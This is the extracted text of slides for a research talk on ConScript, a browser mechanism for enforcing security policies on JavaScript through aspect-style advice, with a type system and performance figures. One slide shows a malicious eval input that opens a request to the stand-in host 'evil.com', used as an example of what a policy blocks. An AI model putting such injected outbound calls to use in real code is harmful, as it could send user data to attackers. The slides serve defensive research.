ConScript Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser Leo Meyerovich UC Berkeley Benjamin Livshits Microsoft.

ConScriptSpecifying and Enforcing Fine-Grained Security Policies

for JavaScript in the Browser

Leo MeyerovichUC Berkeley

Benjamin LivshitsMicrosoft Research

2

3

Complications

Benign but buggy:

who is to blame? Code constantly evolving

How do we maintain quality?

Downright malicious

Prototype hijacking

Developer’s Dilemma

4

5

Only Allow eval of JSON

eval(“([{‘hello’: ‘Oakland’}, 2010])”)

eval(“(xhr.open(‘evil.com’);)”)

• Idea for a policy: – Parse input strings instead of running them– Use ConScript to advise eval calls

• AspectJ advice for Java

• How to do advice in JavaScript?– No classes to speak of

void around call Window::eval (String s) { … }

heap

Advising Calls is Tricky

window.eval = function allowJSON() { … }

windowobject

document

window

x

y

z

…

frames[0]

stackfunction

allowJSONeval

frameobject

eval

eval

function eval

ConScript approach– Deep advice for complete mediation– Implemented within the browser for

efficiency and reliability

6

7

Example of Applying Advice in ConScript

1. <SCRIPT SRC=”facebook.js" POLICY="2. var substr = String.prototype.substring;3. var parse = JSON.parse;4. around(window.eval,5. function(oldEval, str) {6. var str2 = uCall(str, substr, 1,7. str.length - 1);8. var res = parse(str2);9. if (res) return res;10. else throw "eval only for JSON";11. } );">

8

Contributions of ConScript

9

ImplementationA case for aspects in browser

Correctness checking

Expressiveness

Real-world Evaluation

10

heap

Advising JavaScript Functions in IE8

fish

...

...

...

dog

stack

function withBoundChecks

function paint

around(paint, withBoundChecks);dog.draw();fish.display();

draw

display

11

This is Just the Beginning…

• Not just JavaScript functions– native JavaScript calls: Math.round, …– DOM calls: document.getElementById, …

• Not just functions…– script introduction– …

• Optimizations– Blessing – Auto-blessing

12

A case for aspects in browser

Type systemCorrectness checking

Expressiveness

Real-world Evaluation

13

Policies are Easy to Get Wrong

var okOrigin={"http://www.google.com":true};around(window.postMessage, function (post, msg, target) { if (!okOrigin[target]) { throw ’err’; } else { return post.call(this, msg, target); }});

1.2.3.4.5.6.7.8.9.

toString redefinition!

Function.prototype poisoning!

Object.prototype poisoning!

15

How Do We Enforce Policy Correctness?

Application code

• Unperturbed usage of legacy code

• Disallow arguments.caller to avoid stack inspection

(disallowed by ES5’s strict mode)

Policy code

• Modify the JavaScript interpreter– introduce uCall, hasProp,

and toPrimitive– disable eval

• Propose a type system to enforce correct use of these primitives– disable with, …

16

Policy Type System

• ML-like type system• Uses security labels to denote privilege levels• Enforces access path integrity and reference isolation

Reference isolation• o does not leak through poisoning if f is a field

Access path integrity for function calls• o.f remains unpoisoned if T in v : T is not poisoned

17

A case for aspects in browser

Correctness checking

PoliciesExpressiveness

Real-world Evaluation

18

ConScript Policies

• 17 hand-written policies

– Diverse: based on literature, bugs, and anti-patterns

– Short: wrote new HTML tags with only a few lines of code

• 2 automatic policy generators

– Using runtime analysis

– Using static analysis

19

Paper presents

17 ConScript

Policies

around(document.createElement, function (c : K, tag : U) { var elt : U = uCall(document, c, tag); if (elt.nodeName == "IFRAME") throw ’err’; else return elt; });

20

Generating Intrusion Detection Policies

ConScript instrumentation

ConScript enforcement

evalnew Function(“string”)postMessageXDomainRequestxmlHttpRequest…

Observed method calls

21

Enforcing C# Access Modifiers

class File { public File () { … } private open () { … } …

C# JavaScript

function File () { … }File.construct = …File.open = ……

Script#compiler

policygenerator

around(File, pubEntryPoint);around(File.construct, pubEntryPoint);around(File.open, privCall);

ConScript

22

A case for aspects in browser

Correctness checking

Expressiveness

EvaluationReal-world Evaluation

Experimental Evaluation

23

24

DoCoMo Policy Enforcement Overhead

Google Maps (183ms) MSN (439ms) GMail (736ms)0%

10%

20%

30%

40%

50%

60%

70%

80%

7%1% 0%

30%

73%63%

ConScript DoCoMo (JavaScript rewriting)

Runti

me

over

head

H. Kikuchi, D. Yu, A. Chander, H. Inamura, and I. Serikov, “JavaScript instrumentation in practice,” 2008

25

File Size Increase for Blacklisting Policy

ConScript Docomo Caja Sandbox1.0

4.0

7.0

10.0

13.0

1.01.7

4.8

1.21.0 1.5

3.9

10.4

1.0 1.5

4.4

1.5

MSN GMail Google Maps

26

Conclusions

27

QUESTIONS?

29

Mediating DOM Functionswindow.postMessage

frame2.postMessage

JavaScript interpreter

IE8 libraries(HTML, Networking, …)

postMessage

0xff34e5arguments: “hello”, “evil.com”

call advice

around(window.postMessage,

off

0xff34e5 off

);

advice dispatch

[not found]

0xff34e5

deep aspects

function advice1 (foo2) { if (ok()) { foo2(); } else throw ‘exn’; }

function foo () { }

Resuming Calls

30

function advice2 (foo2) { if (ok()) { bless(); foo2(); } else throw ‘exn’; }

function foo () { }

advice onadvice off

bless() temporarily disables advice for next call

Optimizing the Critical Path

31

function advice2 (foo2) { if (ok()) { bless(); foo2(); } else throw ‘exn’; }

function foo () { }

advice on

function advice3 (foo2) { if (ok()) foo2(); else { curse(); throw ‘exn’; } }

function foo () { }

advice offadvice on

• calling advice turns advice off for next call• curse() enables advice for next call